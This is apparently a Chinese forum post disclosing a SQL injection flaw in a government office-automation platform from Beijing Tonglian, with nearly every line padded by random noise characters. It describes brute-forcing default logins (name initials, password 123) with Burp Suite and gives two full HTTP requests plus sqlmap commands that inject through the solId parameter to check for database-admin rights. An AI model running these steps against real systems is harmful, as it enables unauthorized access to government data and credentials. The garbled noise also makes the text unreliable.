|
. G3 f. B' z) ?; R- o
0 B$ B5 K( O; e" f
. y5 J! ]3 B [3 _
* h( q! d+ X2 _: z( O1 Y" n
平台简介:
) i' ^# `$ h; L7 n3 b
2 A; c! Y3 b2 h2 z; [; k5 Q- H! b
% i* j4 I6 ?/ k/ T5 o$ g" }; V9 c 0 X0 U0 w' P- X0 ?5 {
' r# ]4 o# p0 D7 f2 o' G) Y I( _( i8 r# t) W
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 ( d7 F6 Q; {4 \2 Q- ^+ \, E
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* W7 Y5 s8 }8 r$ O0 g. j* k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) x$ v5 f9 K5 e
1 I- F2 \7 N8 z X( B1 |. H/ ?
# ~5 h# @0 |2 y( { L: M
. b% e$ j7 ]( K9 j
" `: V* o7 }* r" {6 g1 W
! O0 g8 ^" t# u) V; l3 H- M# u 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
3 z' ?4 e! G; c) W 0 `! p6 w- T4 e( z+ K( q5 l
0 H* p- A, D h. o* ~ G: M
8 C6 T1 H7 ]; t* S# ~+ |+ ^
& C9 `2 G+ K+ k5 e, X# N; X; o% {
http://1.1.1.1:7197/cap-aco/#(案例2-)
}7 m# S9 s7 U
3 B$ }) r* F: ]
: P% \) f; Q* i" w0 ]1 S# V) } http://www.XXOO.com (案例1-官网网站)4 t9 M) F2 D& w* C+ [) F
4 K1 V1 {* x; d7 @/ ]/ K9 q9 e: l! w/ i2 l* u
1 F b j3 R+ C( R
! [1 S' L6 f# a
3 M8 Q( G2 r' P! Q% }- l! r 漏洞详情:
- @1 H- e7 m( h1 O 8 N* |/ F @, J3 L, n- ~7 V
- v& B: D: T8 a' k, [
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试9 ]7 E6 q1 Q, T' P7 j: h1 U
! P9 v" T% b, V* P
8 ^ G0 L* V9 c G; e 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:, n+ q# ^7 K4 V9 M
3 S! c$ ~. ]( s
0 K) s. N( T5 P( i: H: k! _9 O 2 w) n6 Q0 s3 H6 j4 K! `" C
2 H6 b5 s0 U; I# S& y
# K8 ?& U. l- W% H4 w+ S$ [
1 [5 n7 [/ P; X 4 N9 {$ n/ ^. X
6 Q. Y) Z. k6 u
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
8 s- ?6 \2 b0 k% ? n2 ^' Q- D+ e p
; d3 g$ X8 E5 u( `( M, X& D H 1、案例1-官方网站- d( S2 y3 u/ C+ F h r4 M
9 U- W) ~0 Z6 A. Q3 @$ ]& W s
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1- c2 g9 c1 h7 C6 q1 W
- z* O- A: m% |( e- F6 g0 ~! C* C' Y: s7 T. R& |
Host: www.XXOO.com
9 S/ E6 d" q! u+ e4 w4 d ! X+ g- ~, o ]) u
% N" f e8 R+ z' F9 e& U
Proxy-Connection: Keep-Alive
; I! c( K/ f# V + s6 Q! F, F! ~$ q& {) p
' [2 I! @2 o' \/ O
Accept: application/json, text/javascript, */*; q=0.01
; Z, g) x3 w/ ^$ w; E . @8 e, |- ~8 u0 T) G
3 e/ n8 S' I6 h' P4 G
Accept-Language: zh-CN
0 n" s }2 x$ o' S' l
. d$ y& ^% `7 M. T; k0 Q7 Z0 g! R1 v2 p5 N/ w. u
Content-Type: application/json7 ^6 y3 l" Q. y+ [5 d3 z. R5 d+ x
, b, z: ]" h: b/ f1 b
( k4 m- Q# i& d, c' W/ z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
% u' I: {. r3 C# f
& W3 E, d! K; a) A+ F1 r5 f. G
- r& n( ]+ j" q0 B) S X-Requested-With: XMLHttpRequest
3 J2 D$ R8 C& k* S1 i2 Q) d( ]! X 7 e) k" T) ~: g8 i5 k
* q9 |8 k# M, l: k Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
" B. i' k ]& j$ B! ] ( T: C; f. H% d& s: L7 b, U; U
" P' f4 _ }: J
Accept-Encoding: gzip, deflate, sdch w" Q6 j: z1 p8 t% G7 ~+ S- P
7 U: [+ q0 C9 h/ f1 Z; c5 ^. r- w
+ A2 s, @7 W6 G Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
5 u9 q! b- M- L, M# N. o3 w( S+ s
$ u. x' j( F, b+ p: Y
8 M& x3 z+ A9 ^- _! B; S: s8 y2 V* o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ L8 }0 _! \3 A8 R7 U3 q
, b3 u1 i7 j" n* Y. m( M8 U# ?+ Z* f- U5 W; Y/ j
1 z$ K+ i" o2 t0 W
1 ~+ k! r" R% H: B2 l1 W5 x. |. X8 T, k0 Z0 k
9 ], J) s% \1 b. P* K/ C2 M
2 A) d) J! g2 u' e
% }8 r& a/ c4 e% f7 P 1 m5 I. E5 M% M+ O3 d& G$ r! k% N
- _6 V" d. Q! T6 H, n Q% m/ m0 L/ ^. }
: z3 P+ Q( J M! d4 ?
* s P: E" O! e4 }8 h. b: @
% b9 |: x& f7 J
8 [& k) Z0 j; K& v* I9 e # [5 P+ B" T+ H# h/ y: w+ Q8 _
, @: u2 E/ H$ l7 \; N( v5 W ~ 2、案例2-某天河云平台
/ a9 O& r% m" ^' y# y2 ? 4 T2 W% ~ t% Y
$ G- Q- O) K0 }! f4 L% @0 w F+ ? GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
- G' g; b+ U& t& J% C
# w5 K/ l5 W) N
) V9 i1 o8 D( I Host: 1.1.1.:7197
6 I) I* P7 u. _" z- B! V
- H ^' j& Q$ J+ K! ~) g2 k8 f* S+ l' Z4 L
Accept: application/json, text/javascript, */*; q=0.01
, f# Y7 F- v! e+ @
) e4 w/ y& _) [$ x3 [( {0 S& N$ p0 g; X4 }
X-Requested-With: XMLHttpRequest) n i3 t' {; N- d" U+ I( x
! \/ |! H) X1 _% q* y8 k$ v
5 |# e9 \2 _& Y! H: [' x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" F$ x. L1 Z, o2 ]3 M2 z
8 a; K+ p) Z7 k6 g
% e7 o, t8 l4 k B# v% s7 ^ Content-Type: application/json8 q" f2 ?* _) h' J
3 q6 y+ T5 e) }' W8 c" O6 m, ?/ `0 y" Z
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10086 b. L& @0 M* }4 c4 C, W2 a, B
/ ]/ M* d4 R R, Y. Z$ k* f. \1 y
Accept-Language: zh-CN,zh;q=0.8
% O* S, h3 W) g( q% ` " |3 U2 E, D& M8 n' N
3 \0 I- j8 S5 ?5 s7 ^) S3 @
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
: U! B8 A, J8 r: j: k % K; m. n8 m. F& c5 Q" n
0 G9 p9 ], g* x4 C; h/ H$ E
Connection: close8 y. [7 z, Q# ]/ V6 }, D" S( S
3 X( J/ ]3 ~5 t* m
4 Y' O* Z& z7 R" L7 F
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
' v0 Z; T+ {* v1 N7 ` # h) G5 d0 B, r# ^% ?" ~) B5 x9 |
7 c7 Y9 p/ H2 Y; c& M 0 X& _% M7 V! H3 H, g
7 l+ x* P6 l+ l; U" K$ r3 J5 J8 O% Y' @2 g7 q& ~* G" |9 R: L
# _' f2 o" f( s; J/ M |